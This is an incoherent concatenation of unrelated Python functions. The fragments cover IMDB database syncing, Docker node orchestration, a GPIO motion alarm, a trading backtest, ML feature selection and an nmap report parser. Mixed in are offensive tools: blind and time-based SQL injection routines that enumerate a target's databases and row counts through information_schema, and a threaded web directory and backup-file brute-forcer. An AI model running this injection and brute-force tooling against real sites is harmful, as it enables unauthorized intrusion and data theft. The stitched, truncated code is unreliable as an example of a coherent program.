def get_content_count(self, database_name, table_name):
    # Start injecting the content count
    logger.debug("Start sqli table %s content amount..." % table_name)
    logger.debug("The sqlirequest is %s, start sqli content..." % self.sqlirequest)

    if self.sqlimethod == "normal":
        logger.debug("The sqlimethod is %s..." % self.sqlimethod)
        logger.debug("Start table's %s content amount sqli..." % table_name)

        # Inject the number of rows
        content_count = normal_injection(select="count(*)",
                                         source=database_name + "." + table_name,
                                         dealpayload=self.dealpayload,
                                         data=self.Data, isCount=True,
                                         sqlirequest=self.sqlirequest)

        logger.debug("Content amount sqli success...The count is %d..." % content_count)

        # Return the content count
        logger.info("[*] content count: %d" % content_count)
        return content_count

    elif self.sqlimethod == "build":
        logger.debug("The sqlimethod is %s..." % self.sqlimethod)
        logger.debug("Start table's %s content amount sqli..." % table_name)

        retVal = build_injection(select="count(*)",
                                 source=database_name + "." + table_name,
                                 dealpayload=self.dealpayload, data=self.Data,
                                 lens=self.len, isCount=True,
                                 sqlirequest=self.sqlirequest)
        content_count = int(retVal)

        logger.debug("Content amount sqli success...The content_count is %d..." % content_count)

        # Return the content count
        logger.info("[*] content count: %d" % content_count)
        return content_count

    elif self.sqlimethod == "time":
        logger.debug("The sqlimethod is %s..." % self.sqlimethod)
        logger.debug("Start table's %s content amount sqli..." % table_name)

        retVal = time_injection(select="count(*)",
                                source=database_name + "." + table_name,
                                dealpayload=self.dealpayload, data=self.Data,
                                times=self.time, isCount=True,
                                sqlirequest=self.sqlirequest)
        content_count = int(retVal)

        logger.debug("Content amount sqli success...The content_count is %d..." % content_count)

        # Return the content count
        logger.info("[*] content count: %d" % content_count)
        return content_count
def export2lmdb(self, lmdb_host, lmdb_dbname):
    """
    Export data from the IMDB database to LMDB
    :param lmdb_host:
    :param lmdb_dbname:
    :return:
    """
    logger.info('export to lmdb')
    since = 0
    i = 0
    while True:
        movies = self.DbOperator.get_movies_to_export_lmdb(since, limit=self.DbOperator.LIMIT)
        if movies:
            for movie in movies:
                movieid = movie[0]
                imdbid = 'tt%07d' % int(movie[1])
                i += 1
                try:
                    imdbmovie = self.IMDbObj.get_movie(imdbid, movieid)
                    imdbmovie.save2db(lmdb_host, lmdb_dbname)
                    logger.info(
                        '%d, %s, %s, %s, %s' % (i, movieid, imdbid, imdbmovie['url'], imdbmovie['posterurl'])
                    )
                except Exception as e:
                    logger.error('save db error: %s \r\n %s' % (imdbid, str(e)))
            since += self.DbOperator.LIMIT
        else:
            break
def bootstrap(self):
    self.update_nodes()
    _updated = False
    for name, node in self.nodes.items():
        try:
            node.connect()
        except:
            pass
        if not node.exists or not node.name:
            L.info("Node not found, creating a new node")
            self.create_node(name, self.cfg)
            # Unset it so we really refresh it
            _updated = True
        node.cleanup_dead()
        L.ok("Node %s alive and ready!" % name)
    if _updated:
        self.update_nodes()

    played = []
    for s in self.base_services:
        played += self.play_service(self.nodes, s)
    if played:
        L.ok("Base services setup, cooling down while everything starts...")
        time.sleep(30)
    for s in self.dj_services + self.user_services:
        self.play_service(self.nodes, s)
    L.ok("Node setup OK!")
    return True
def kill_containers(context):
    cfg = context.obj
    for manager in cfg['managers']:
        mgr = cfg['project'].manager_for(manager)
        for name, node in mgr.nodes.items():
            L.info('Stopping %d containers on node %s' % (len(node.containers), name))
            node.stop_container()
def download_listfile(self):
    """
    Download the IMDB list files, see http://www.imdb.com/interfaces
    :return:
    """
    logger.info('download listfile')
    self.Downloader.download()
    logger.info('download listfile is success!')
def kill_services(context):
    cfg = context.obj
    for manager in cfg['managers']:
        mgr = cfg['project'].manager_for(manager)
        for s_name in mgr.user_services:
            for name, node in mgr.nodes.items():
                containers = node.running_services.get(s_name, [])
                L.info('Stopping %d containers running %s on node %s' %
                       (len(containers), s_name, name))
                for container in containers:
                    node.stop_container(id=container)
def setDetection(new):
    if re.search("true", str(new)):
        status = True
        logger.info("DETECTION!")
    elif re.search("false", str(new)):
        status = False
        logger.info("DETECTION cleared")
    else:
        logger.warn("Invalid status %s for DETECTION" % (new))
        return
    global DETECTION
    DETECTION = status
def play_service(self, nodes, name):
    service = self.services[name]
    schedules = service.schedule(nodes)
    if len(schedules):
        L.info("Starting service %s %s times on %d nodes" % (
            name, len(schedules), len(nodes)))
        for node, schedule in schedules:
            self.play_by_schedule(node, schedule)
        L.ok("Service %s started OK" % name)
    else:
        L.ok("Service %s was running OK" % name)
    return schedules
def setActive(new):
    # if(newStatus is False or newStatus is "False" or newStatus is "false" or newStatus is 0 or newStatus is "0"):
    if re.search("false", str(new)):
        status = False
        logger.info("Alarm deactivated")
    # elif(newStatus is True or newStatus is "True" or newStatus is "true" or newStatus is 1 or newStatus is "1"):
    elif re.search("true", str(new)):
        status = True
        logger.info("Alarm activated")
    else:
        logger.warn("Invalid status %s" % (new))
        return
    global active
    active = status
def dir_bruter(word_queue, target_url, stime, extensions=None, pbar=None):
    while not word_queue.empty():
        pbar.update(1)
        attempt = word_queue.get()
        attempt_list = []

        # Check whether there is a file extension; if not, it is a path we want to brute-force
        # if "." not in attempt:
        #     attempt_list.append("%s/" % attempt)
        # else:
        attempt_list.append("%s" % attempt)

        # If we also want to brute-force extensions
        if extensions:
            for extension in extensions:
                if extension == ".swp":
                    attempt_list.append("/.%s%s" % (attempt.strip('/'), extension))
                else:
                    attempt_list.append("%s%s" % (attempt, extension))

        # Iterate over the list of paths we want to try
        for brute in attempt_list:
            url = "%s%s" % (target_url, urllib.quote(brute))
            # print url
            try:
                headers = {}
                headers["User-Agent"] = conf['ua']
                r = urllib2.Request(url, headers=headers)
                # pbar.update(1)
                try:
                    response = urllib2.urlopen(r, timeout=2)
                except:
                    logger.error("Time out...")
                    continue  # the request may otherwise hang

                # Sleep after the request completes
                time.sleep(stime)

                if response.code != 404:
                    logger.info("Get !!!!" + url)
                    tqdm.write("[%d] => %s" % (response.code, url))
            except urllib2.URLError, e:
                if hasattr(e, 'code') and e.code != 404:
                    tqdm.write("!!! %d => %s" % (e.code, url))
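# dir_bruter above consumes a pre-filled word_queue; what follows is a minimal sketch of a
# wordlist loader and thread launcher, assuming Python 2 (matching the urllib2 usage above)
# and a hypothetical "wordlist.txt" path -- the project's real driver code may differ.
import Queue
import threading


def build_word_queue(wordlist_file):
    # Hypothetical helper: read one path candidate per line into the queue
    word_queue = Queue.Queue()
    with open(wordlist_file) as f:
        for word in f:
            word = word.rstrip()
            if word:
                word_queue.put(word)
    return word_queue

# Example usage (hypothetical):
# word_queue = build_word_queue("wordlist.txt")
# pbar = tqdm(total=word_queue.qsize())
# for _ in xrange(10):
#     t = threading.Thread(target=dir_bruter,
#                          args=(word_queue, "http://target/", 0.1, [".bak", ".swp"], pbar))
#     t.start()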
def backup(self, dbname):
    logger.info('backup db')
    self.backupdb(dbname)
    logger.info('backup db is success!')

    logger.info('test backup db file')
    sys.stdout.flush()
    self.test_backupfile(dbname)
    logger.info('test backupfile is success!')

    self.move_backupfile(dbname)
def serv_forever(sub_p, pub_p):
    context = zmq.Context()
    pub_s = context.socket(zmq.PUB)
    pub_s.bind('tcp://*:{PUB_PORT}'.format(PUB_PORT=pub_p))

    sub_s = context.socket(zmq.SUB)
    sub_s.setsockopt(zmq.SUBSCRIBE, '')
    sub_s.bind('tcp://*:{SUB_PORT}'.format(SUB_PORT=sub_p))

    poller = zmq.Poller()
    poller.register(sub_s, zmq.POLLIN)

    while 1:
        # Poll inside the loop so every iteration waits for new messages
        socks = dict(poller.poll(360000))
        if socks:
            for sock, event in socks.iteritems():
                if sock is sub_s:
                    frame = sub_s.recv_multipart()
                    logger.info('MESSAGE:%s', frame)
                    pub_s.send_multipart(frame)
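# For reference, a minimal sketch of peers talking to the forwarder above: a publisher
# connects to the forwarder's SUB port and a subscriber to its PUB port. The 9021/9022
# ports are the defaults from the __main__ block; the host and topic are assumptions.
import zmq

ctx = zmq.Context()

producer = ctx.socket(zmq.PUB)
producer.connect('tcp://127.0.0.1:9021')   # forwarder's SUB side
# (in practice allow a brief pause after connect before the first publish)
producer.send_multipart([b'topic', b'hello'])

consumer = ctx.socket(zmq.SUB)
consumer.connect('tcp://127.0.0.1:9022')   # forwarder's PUB side
consumer.setsockopt(zmq.SUBSCRIBE, b'')
# frame = consumer.recv_multipart()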
def create_node(self, name, cfg=None, options=None):
    if not cfg:
        cfg = {}
    if not options:
        options = {}
    else:
        cfg.update(options)
    options['provider'] = cfg.get('provider', {'name': 'local'})
    iaas = options['provider'].get('driver', 'virtualbox')
    services = options['services'] = options.get('services', [])
    L.info("Creating new machine %s on %s" % (name, iaas))
    swarm = cfg.get('swarm-token', '')
    extra = ' '.join(options['provider'].get('extra', []))
    if not len(self.running_nodes):
        swarm_extra = ' --swarm --swarm-master --swarm-discovery token://%s' % swarm
    else:
        swarm_extra = ' --swarm --swarm-discovery token://%s' % swarm
    command = "docker-machine create --driver %s %s%s %s" % (
        iaas, extra, swarm_extra if swarm else '', name)
    output = call(command)
    L.ok("Done creating %s on %s!" % (name, iaas))
    self.update_nodes()
def run(self, *args, **kwargs):
    build = kwargs.pop('build', None)
    image = kwargs.get('image', None)
    if build:
        L.info("Building image %s on node %s" % (image, self.name))
        self.call_docker("build %s" % build)
    if image:
        tagged = ':' in image and image or '%s:latest' % image
        if not tagged in self.local_images():
            L.info("Can't find image %s, attempting to pull..." % image)
            self.call_docker("pull %s" % image)
        elif ':' in image and image.endswith('latest'):
            L.info("Image %s tagged 'latest', updating..." % image)
            try:
                self.call_docker("pull %s" % image)
            except:
                pass
    kwargs['image'] = image
    command_line = 'docker %s run %s %s' % (self.node_connect_str, image,
                                            kwargs.get('command', '') or '')
    L.v("Using docker-py API to create container, you can run this --")
    L.v(command_line)
    dns = kwargs.pop('dns', None)
    dns_search = kwargs.pop('dns_search', None)
    privileged = kwargs.pop('privileged', '') == 'ceph' and 'ceph/' in image
    container = self.client.create_container(*args, **kwargs)
    return self.client.start(container, dns=dns, privileged=privileged), container
def update_movie_imdbid(self):
    """
    Update the IMDBID field of movies in the IMDB database.
    If updating a movie's IMDBID fails 10 times in a row, stop trying
    (it is probably a network problem or similar).
    :return:
    """
    logger.info('update imdb_id field')
    count = 0
    max_try = 10
    try_times = 0
    while True:
        movies = self.DbOperator.get_null_imdbid_movies()
        if len(movies) == 0:
            break
        for movie in movies:
            count += 1
            try:
                logger.info('%s: %s' % (count, self.get_imdbid_result(movie[0])))
                try_times = 0  # reset the consecutive-error counter on success
            except Exception:
                try_times += 1
                time.sleep(3)
                if try_times == max_try:
                    logger.error(traceback.format_exc())
                    return
    logger.info('update imdb_id field is success!')
def main():
    # main
    # activate API
    if api.lunch():
        logger.info("API started")
    else:
        logger.error("API failed to start")

    GPIO.setmode(GPIO.BOARD)
    pir = 26
    GPIO.setup(pir, GPIO.IN)

    logger.info("Application started")
    while True:
        while active.getActive():
            if GPIO.input(pir):
                time.sleep(1)
                if GPIO.input(pir):
                    active.setDetection("true")
                    sender.emailAlert()
                    active.setDetection("false")
            time.sleep(0.2)
def _update_imdb_movies(self, getdata_func):
    """
    Update IMDB movie information.
    Use imdbpy to fetch the latest movie information, then update the database.
    :param getdata_func: returns the IMDB movies to be updated
    :return:
    """
    i = 0
    since = 0
    while True:
        movies = getdata_func(limit=self.DbOperator.LIMIT, since=since)
        if movies:
            for movie in movies:
                imdbid = movie[0]
                try:
                    # Check that the imdbid has a valid format
                    if not re.match('tt\d{7}', imdbid):
                        raise Exception('not a valid imdbid')
                    if self.DbOperator.is_error_imdbid_movie(imdbid):
                        logger.info('error imdbid: %s' % imdbid)
                        continue
                    imdbmovie = self.IMDbObj.get_movie(imdbid)
                    imdbmovie.save2db(self.DbOperator.HOST, self.DbOperator.DB)
                    i += 1
                    logger.info(
                        (i, imdbid, imdbmovie['url'], imdbmovie['rating'], imdbmovie['posterurl']).__str__()
                    )
                except Exception as e:
                    time.sleep(30)
                    # If the IMDB network is fine but no information could be fetched,
                    # the imdbid is probably wrong, so clear it
                    if self.IMDbObj.is_network_ok():
                        self.DbOperator.clear_imdbid(imdbid)
                        logger.info('clear imdbid: %s' % imdbid)
                    else:
                        logger.warning('update imdb fail: %s' % (str(e)))
                        return
            since += self.DbOperator.LIMIT
            logger.info('exported count: %d' % i)
        else:
            break
def import_listfile(self):
    """
    Import the IMDB list files into the DB.
    If something goes wrong during the import, restore from the previous backup.
    :return:
    """
    logger.info('import listfile to db')
    try:
        self.make_csvdir()
        imdbpy2sql_path = os.path.normpath('%s/updateimdb/bin/' % DIR_CRONTAB)
        cmd = 'python %s/imdbpy2sql.py -d %s -u %s -c %s -i table' \
              % (imdbpy2sql_path, self.Downloader.get_download_dir_path(),
                 self.DbOperator.URI, self.get_csvdir())
        subprocess.check_call(cmd, shell=True)
    except Exception:
        logger.error('error occurred during import listfile to db, try to restore the older db')
        self.DbBackup.restoredb(self.DbOperator.DB,
                                '%s/%s.bak' % (self.DbBackup.BACKUPDIR, self.DbOperator.DB))
        logger.info('restore success!')
        raise
    logger.info('import listfile to db is success!')
def play_by_schedule(self, node, schedule): s = schedule ip = s['ip'] name = s['node'] role = s.get('role', None) number = s.get('number', None) s['leader_ip'] = self.leader_ip s['container_name'] = container_name = s.get('container_name', '%(service)s.%(node)s.%(domain)s')%(s) labels = {'service': s['service']} labels.update(s.get('labels',{})) ports = map(str, s.get('ports', [])) dynamic = map(str, s.get('dynamic_ports', [])) expose = [] bind = {} for p in ports: if '/' in p: p, proto = p.split('/') else: proto = 'tcp' if ':' in p: h_p, c_p = map(int, p.split(':')) else: h_p = c_p = int(p) if proto in ['tcp', 'both']: expose.append(c_p) bind[c_p] = (node.ip, h_p) if proto in ['udp', 'both']: expose.append( (c_p, 'udp') ) bind['%s/udp'%c_p] = (node.ip, h_p) L.info('Opening static port on %s:%s to %s'%(node.ip, h_p, c_p)) for p in dynamic: if '/' in p: p, proto = p.split('/') else: proto = 'tcp' c_p = int(p) if proto in ['tcp', 'both']: expose.append(c_p) bind[c_p] = (node.ip, ) if proto in ['udp', 'both']: expose.append( (c_p, 'udp') ) bind['%s/udp'%c_p] = (node.ip, ) L.info('Opening dynamic port on %s to %s'%(node.ip, c_p)) node.cleanup_dead(name=container_name) if not node.is_running(name=container_name): build = s.get('build', None) image = build and s.get('service', '') or s.get('image', None) instance = node.run( name=container_name, hostname=container_name, image=image, build=build, ports=expose, command=s.get('command', '')%s, environment=[e%s for e in s.get('environment', [])], labels=labels, host_config = node.client.create_host_config( binds=s.get('volumes', None), port_bindings=bind, dns=[self.leader_ip], dns_search=[self.cfg.get('domain', None)], network_mode=s.get('network', None), ) ) else: L.debug("Already running %s"%(container_name))
def trading_day(self, day):
    session = self.createSession()
    for symbol, strat in self.strategies.items():
        try:
            signal = strat.get_signal(day)  # ToDo: Handle exceptions
        except Exception as e:
            logger.debug("Exception for {} at day {}: {}".format(symbol, day, e))
            continue
        session.add(signal)  # Save signals to db for history

        # Get asset
        asset = self.exchange.get_or_create_asset(session, symbol)

        # Manage open positions
        longs = self.exchange.get_open_long(session, asset)
        for o in longs:
            if o.should_stop(signal.close):
                logger.info('[Day: {}] Closing long position {} on {} due to stop loss'.format(day, o.id, o.symbol))
                _, log = self.exchange.close_order(day, asset, o, o.stop_loss)
                session.add(log)
                continue
            # If signal is SELL or position has a 1% profit
            if signal.signal == SignalType.SELL:
                logger.info(
                    '[Day: {}] Closing long position {} on {} due to SELL signal'.format(day, o.id, o.symbol))
                _, log = self.exchange.close_order(day, asset, o, signal.close)
                session.add(log)
                continue

        shorts = self.exchange.get_open_short(session, asset)
        for o in shorts:
            # If close meets stop loss, close position
            if o.should_stop(signal.close):
                logger.info(
                    '[Day: {}] Closing short position {} on {} due to stop loss'.format(day, o.id, o.symbol))
                _, log = self.exchange.close_order(day, asset, o, o.stop_loss)
                session.add(log)
                continue
            # If signal is BUY we're going to lose money, so we close position
            if signal.signal == SignalType.BUY:
                logger.info(
                    '[Day: {}] Closing short position {} on {} due to BUY signal'.format(day, o.id, o.symbol))
                _, log = self.exchange.close_order(day, asset, o, signal.close)
                session.add(log)
                continue
            # If signal is HOLD and position is old
            if o.get_age_in_days(day) > 2 and signal.signal == SignalType.HOLD:
                logger.info('[Day: {}] Closing short position {} on {} due to age'.format(day, o.id, o.symbol))
                _, log = self.exchange.close_order(day, asset, o, signal.close)
                session.add(log)
                continue

        ## Open new positions
        # Determine position sizing
        position_coins = asset.position_size(signal.close, self.order_size)
        # Open the order
        if signal.signal == SignalType.BUY:
            logger.info(
                '[Day: {}] Opening long position on {} due to BUY signal [Close {}, Price {}, Coins {}]'.format(
                    day, symbol, signal.close, position_coins * signal.close, position_coins))
            o, log = self.exchange.open_order(day, OrderType.LONG, asset, position_coins, signal.close,
                                              stop_loss=-0.01)  # Stop loss is -1%
            if not o:
                logger.error("LONG FAILED")
            else:
                session.add(o)
                session.add(log)
        elif signal.signal == SignalType.SELL:
            logger.info(
                '[Day: {}] Opening short position on {} due to SELL signal [Close {}, Price {}, Coins {}]'.format(
                    day, symbol, signal.close, position_coins * signal.close, position_coins))
            o, log = self.exchange.open_order(day, OrderType.SHORT, asset, position_coins, signal.close,
                                              stop_loss=0.01)  # Stop loss is +1%
            if not o:
                logger.error("SHORT FAILED")
            else:
                session.add(o)
                session.add(log)

        session.add(Equity(
            day=day,
            symbol=symbol,
            equity=asset.equity(signal.close),
            longs=asset.long_orders,
            shorts=asset.short_orders
        ))
    session.commit()
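# The Order model used above (should_stop, stop_loss) is not shown; this is a minimal sketch
# of what a stop-loss check could look like, assuming stop_loss is a signed fraction
# (-0.01 = -1% for longs, +0.01 = +1% for shorts). The project's actual model may instead
# convert that fraction into an absolute exit price, since close_order() receives o.stop_loss
# as the closing price.
class OrderSketch(object):  # hypothetical, not the project's Order class
    def __init__(self, order_type, open_price, stop_loss):
        self.type = order_type
        self.open_price = open_price
        self.stop_loss = stop_loss

    def should_stop(self, close):
        # True once the unrealized move has crossed the stop threshold.
        change = (close - self.open_price) / self.open_price
        if self.type == OrderType.LONG:
            return change <= self.stop_loss   # long: stop on a drop
        return change >= self.stop_loss       # short: stop on a rise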
def build_model(dataset, pipeline, experiment, current_target='class', test_size=0.3): models_dir = './results/{}_{}_{}/models/'.format(dataset, pipeline, experiment) reports_dir = './results/{}_{}_{}/reports/'.format(dataset, pipeline, experiment) experiment_index_file = './results/{}_{}_{}/index.json'.format( dataset, pipeline, experiment) log_file = './results/{}_{}_{}/model_build.log'.format( dataset, pipeline, experiment) scoring = make_scorer(precision_score, zero_division=1, average='micro') os.makedirs(models_dir, exist_ok=True) os.makedirs(reports_dir, exist_ok=True) # Setup logging logger.setup(filename=log_file, filemode='w', root_level=logging.DEBUG, log_level=logging.DEBUG, logger='build_model') index_name = 'index' if '.' in dataset: splits = dataset.split(".") dataset = splits[0] index_name = splits[1] # Load the dataset index dataset_index = load_dataset(dataset, return_index=True, index_name=index_name) # Dynamically import the pipeline we want to use for building the model logger.info('Start experiment: {} using {} on {} with target {}'.format( experiment, pipeline, dataset, current_target)) reports = ReportCollection(dataset, pipeline, experiment) for _sym, data in {'BTC': dataset_index['BTC']}.items(): try: logger.info('Start processing: {}'.format(_sym)) features = pd.read_csv(data['csv'], sep=',', encoding='utf-8', index_col='Date', parse_dates=True) targets = pd.read_csv(data['target_csv'], sep=',', encoding='utf-8', index_col='Date', parse_dates=True) # Drop columns whose values are all NaN, as well as rows with ANY nan value, then # replace infinity values with nan so that they can later be imputed to a finite value features = features.dropna( axis='columns', how='all').dropna().replace([np.inf, -np.inf], np.nan) target = targets.loc[features.index][current_target] #X_train, X_test, y_train, y_test = train_test_split(features, target, shuffle=False, test_size=test_size) all_size = features.shape[0] train_size = int(all_size * (1 - test_size)) features = detabularise( features[[c for c in features.columns if 'close' in c]]) X_train = features.iloc[0:train_size] y_train = target.iloc[0:train_size] X_test = features.iloc[train_size:all_size] y_test = target.iloc[train_size:all_size] # Summarize distribution logger.info("Start Grid search") clf = ShapeletTransformClassifier(time_contract_in_mins=5) clf.fit(X_train, y_train) print('{} Score: {}'.format(_sym, clf.score(X_test, y_test))) pred = clf.predict(X_test) print(classification_report(y_test, pred)) logger.info("End Grid search") logger.info("--- {} end ---".format(_sym)) except Exception as e: logger.error( "Exception while building model pipeline: {} dataset: {} symbol: {}\nException:\n{}" .format(pipeline, dataset, _sym, e)) traceback.print_exc() return reports
def get_database(self): logger.debug("The sqlirequest is %s, start sqli databases..." % self.sqlirequest) if self.sqlimethod == "normal": logger.debug("The sqlimethod is %s..." % self.sqlimethod) logger.debug("Start database amount sqli...") # 先注databases的数量 databases_number = normal_injection(select='COUNT(`SCHEMA_NAME`)', source='information_schema.SCHEMATA', dealpayload=self.dealpayload, data=self.Data, isCount=True, sqlirequest=self.sqlirequest ) logger.debug("Databases amount sqli success...The databases_number is %d..." % databases_number) print "[*] databases_number: %d" % databases_number # 每个循环跑一次databases的数据 for i in trange(int(databases_number), desc="Database sqli...", leave=False, disable=True): # 首先是database name的长度 logger.debug("Start %dth database length sqli..." % (i + 1)) databases_name_len = normal_injection(select='length(`SCHEMA_NAME`)', source='information_schema.SCHEMATA', limit=i, dealpayload=self.dealpayload, data=self.Data, isCount=True, sqlirequest=self.sqlirequest ) logger.debug("%dth Databases name length sqli success...The databases_name_len is %d..." % ((i + 1), databases_name_len)) logger.info("[*] %dth databases_name_len: %d" % ((i + 1), databases_name_len)) # 然后注database name logger.debug("Start %dth database name sqli..." % (i + 1)) databases_name = normal_injection(select='`SCHEMA_NAME`', source='information_schema.SCHEMATA', limit=i, dealpayload=self.dealpayload, data=self.Data, isStrings=True, sqlirequest=self.sqlirequest ) logger.debug( "%dth Databases name sqli success...The databases_name is %s..." % ((i + 1), databases_name)) # 把databases_name 中不是information_schema插入列表 if databases_name != "information_schema": self.databases_name.append(databases_name) logger.info("[*] %dth databases_name: %s" % ((i + 1), databases_name)) elif self.sqlimethod == "build": logger.debug("The sqlimethod is %s..." % self.sqlimethod) logger.debug("Start database amount sqli...") retVal = build_injection(select="COUNT(`SCHEMA_NAME`)", source="information_schema.SCHEMATA", dealpayload=self.dealpayload, data=self.Data, lens=self.len, isCount=True, sqlirequest=self.sqlirequest) databases_number = int(retVal) logger.debug("Databases amount sqli success...The databases_number is %d..." % databases_number) logger.info("[*] databases_number: %d" % databases_number) for i in range(0, int(databases_number)): logger.debug("Start %dth database length sqli..." % (i + 1)) # 然后注databases_name 的 length retVal = build_injection(select="length(`SCHEMA_NAME`)", source="information_schema.SCHEMATA", limit=i, dealpayload=self.dealpayload, data=self.Data, lens=self.len, isCount=True, sqlirequest=self.sqlirequest) databases_name_len = int(retVal) logger.debug("%dth Databases name length sqli success...The databases_name_len is %d..." % ((i + 1), databases_name_len)) logger.info("[*] %dth databases_name_len: %d" % ((i + 1), databases_name_len)) # 然后注databases名字 # 清空database_name databases_name = "" logger.debug("Start %dth database sqli..." % (i + 1)) for j in trange(int(databases_name_len), desc='%dth Database sqli' % (i + 1), leave=False): retVal = build_injection(select="ascii(substring(`SCHEMA_NAME`," + repr(j + 1) + ",1))", source="information_schema.SCHEMATA", limit=i, dealpayload=self.dealpayload, data=self.Data, lens=self.len, isStrings=True, sqlirequest=self.sqlirequest) databases_name += chr(retVal) logger.debug( "%dth Databases name sqli success...The databases_name is %s..." 
% ((i + 1), databases_name)) # 把databases_name 中不是information_schema插入列表 if databases_name != "information_schema": self.databases_name.append(databases_name) logger.info("[*] %dth databases_name: %s" % ((i + 1), databases_name)) elif self.sqlimethod == "time": logger.debug("The sqlimethod is %s..." % self.sqlimethod) logger.debug("Start database amount sqli...") retVal = time_injection(select="COUNT(`SCHEMA_NAME`)", source="information_schema.SCHEMATA", dealpayload=self.dealpayload, data=self.Data, times=self.time, isCount=True, sqlirequest=self.sqlirequest) databases_number = int(retVal) logger.debug("Databases amount sqli success...The databases_number is %d..." % databases_number) logger.info("[*] databases_number: %d" % databases_number) for i in range(0, int(databases_number)): logger.debug("Start %dth database length sqli..." % (i + 1)) # 然后注databases_name 的 length retVal = time_injection(select="length(`SCHEMA_NAME`)", source="information_schema.SCHEMATA", limit=i, dealpayload=self.dealpayload, data=self.Data, times=self.time, isCount=True, sqlirequest=self.sqlirequest) databases_name_len = int(retVal) logger.debug("%dth Databases name length sqli success...The databases_name_len is %d..." % ((i + 1), databases_name_len)) logger.info("[*] %dth databases_name_len: %d" % ((i + 1), databases_name_len)) # 然后注databases名字 # 清空databases_name databases_name = "" logger.debug("Start %dth database sqli..." % (i + 1)) for j in trange(int(databases_name_len), desc='%dth Database sqli' % (i + 1), leave=False): retVal = time_injection(select="ascii(substring(`SCHEMA_NAME`," + repr(j + 1) + ",1))", source="information_schema.SCHEMATA", limit=i, dealpayload=self.dealpayload, data=self.Data, times=self.time, isStrings=True, sqlirequest=self.sqlirequest) databases_name += chr(retVal) logger.debug( "%dth Databases name sqli success...The databases_name is %s..." % ((i + 1), databases_name)) # 把databases_name 中不是information_schema插入列表 if databases_name != "information_schema": self.databases_name.append(databases_name) logger.info("[*] %dth databases_name: %s" % ((i + 1), databases_name)) databases_name = ','.join(self.databases_name) print "[*] databases_name list: " + databases_name
from threading import Thread
from time import sleep

from lib.log import logger

logger.info("Loading library: {0}".format(__name__))

pins = {"1": 10, "2": 9, "3": 11, "4": 22}
OUT = 1
IN = 2
interrupt = None


def setup(gpio_pin, in_out):
    pass


def output(gpio_pin, high_low):
    for v in pins:
        if pins[v] == gpio_pin:
            logger.debug("Relay[{0}] is {1}".format(
                v, "HIGH" if high_low else "LOW"))


def main():
    output(11, True)
    output(9, False)


def add_interrupt_callback(gpio_pin, func, **kwargs):
    global interrupt
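# The module above is a logging-only stand-in for a subset of RPi.GPIO (setup/output/
# add_interrupt_callback), useful for exercising relay code off the Pi. A hypothetical way
# to wire it in (the "lib.gpio_stub" import path is an assumption, not the project's name):
#
# try:
#     import RPi.GPIO as GPIO
# except ImportError:
#     import lib.gpio_stub as GPIO  # fall back to this stub during development
#
# GPIO.setup(11, GPIO.OUT)
# GPIO.output(11, True)   # with the stub this only logs: Relay[3] is HIGH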
def run(self):
    # Define this function for threading; defining it here or in a child class both work
    self.process()
    self.d = self.get_hostnames()
    self.e = self.get_emails()
    logger.info("{0} found {1} domain(s) and {2} email(s)".format(
        self.engine_name, len(self.d), len(self.e)))
    return self.d, self.e
def main(): result = {} for _sym in SYMBOLS: dataset = 'data/result/datasets/csv/{}.csv'.format(_sym) df = pd.read_csv(dataset, sep=',', encoding='utf-8', index_col='Date', parse_dates=True) df = df.replace([np.inf, -np.inf], np.nan).dropna() X = df[df.columns.difference(['target', 'target_pct', 'target_label'])] y = df['target'] #print("======"+_sym+"======") #print(X.info()) # Variance Threshold sel = VarianceThreshold() sel.fit_transform(X) sup = sel.get_support() X = X[[name for flag, name in zip(sup, X.columns) if flag]] ## SelectKBest sel = SelectKBest(chi2, k=30) sX = scale(X, scaler='minmax') sel.fit_transform(sX, y) sup = sel.get_support() sX = sX[[name for flag, name in zip(sup, sX.columns) if flag]] ## Recursive Feature Elimination # Create the RFE object and compute a cross-validated score. # The "accuracy" scoring is proportional to the number of correct # classifications # model = SVC(kernel="linear") # rfecv = RFECV(estimator=model, step=1, cv=StratifiedKFold(2), scoring='accuracy', n_jobs=-1, verbose=1) # rfecv.fit(X, y) # X = X[[name for flag, name in zip(rfecv.support_, X.columns) if flag]] ### Genetic # estimator = MLPClassifier(**{ # 'hidden_layer_sizes': (10, 4), # 'solver': 'lbfgs', # 'learning_rate': 'constant', # 'learning_rate_init': 0.001, # 'activation': 'logistic' # }) estimator = LogisticRegression(solver="liblinear", multi_class="ovr") gscv = GeneticSelectionCV(estimator, cv=2, verbose=1, scoring="accuracy", max_features=30, n_population=50, crossover_proba=0.5, mutation_proba=0.2, n_generations=80, crossover_independent_proba=0.5, mutation_independent_proba=0.05, tournament_size=3, n_gen_no_change=10, caching=True, n_jobs=-1) gscv = gscv.fit(X, y) X = X[[name for flag, name in zip(gscv.support_, X.columns) if flag]] #print(X.columns) # print("[%s] Optimal number of features : %d Set: %s" % (_sym, rfecv.n_features_, ', '.join(X.columns))) # plt.figure() # plt.title(_sym + ' SVC RFECV K=2') # plt.xlabel("Number of features selected") # plt.ylabel("Cross validation score (nb of correct classifications)") # plt.plot(range(1, len(rfecv.grid_scores_) + 1), rfecv.grid_scores_) # plt.show() logger.info("{}: {}".format(_sym, X.columns)) result[_sym] = { 'dataset': dataset, 'columns_genetic_lr_30': [c for c in X.columns], 'columns_kbest_30': [c for c in sX.columns] } return result
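# The scale() helper used above is not shown; a minimal sketch under the assumption that it
# wraps an sklearn scaler and preserves the DataFrame (the caller indexes the result by
# column name, and chi2 requires non-negative inputs, hence the 'minmax' default here).
import pandas as pd
from sklearn.preprocessing import MinMaxScaler, StandardScaler


def scale_sketch(df, scaler='minmax'):  # hypothetical stand-in for scale()
    s = MinMaxScaler() if scaler == 'minmax' else StandardScaler()
    return pd.DataFrame(s.fit_transform(df.values), columns=df.columns, index=df.index)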
# open final report file
with open(csv_filename, 'w') as csvwrite:
    # set field names
    fieldnames = ['IP Address', 'Port/Protocol', 'Domains', 'Operating System', 'OS Version', 'Notes']
    writer = csv.DictWriter(csvwrite, fieldnames=fieldnames, dialect=csv.excel, quoting=csv.QUOTE_ALL)
    # write CSV header
    writer.writeheader()

    # iterate through xml(s)
    for xml_report in nmap_xml_reports:
        try:
            # try to load the xml file
            nmap_report = NmapParser.parse_fromfile(xml_report)
            logger.info("%s host(s) loaded from %s" % (len(nmap_report.hosts), xml_report))
        except Exception, e:
            logger.warn("XML file %s corrupted or format not recognized" % xml_report)
            # keep looking at the other xml files
            continue

        # start a cumulative dictionary
        results = nmap_combine(nmap_report, results)
        # print "results: %s" % len(results)

    logger.info("Wrapping up results")
    for ip_address in results:
        # collecting info for each field
        open_ports = check_ports(results[ip_address]['Port/Protocol'])
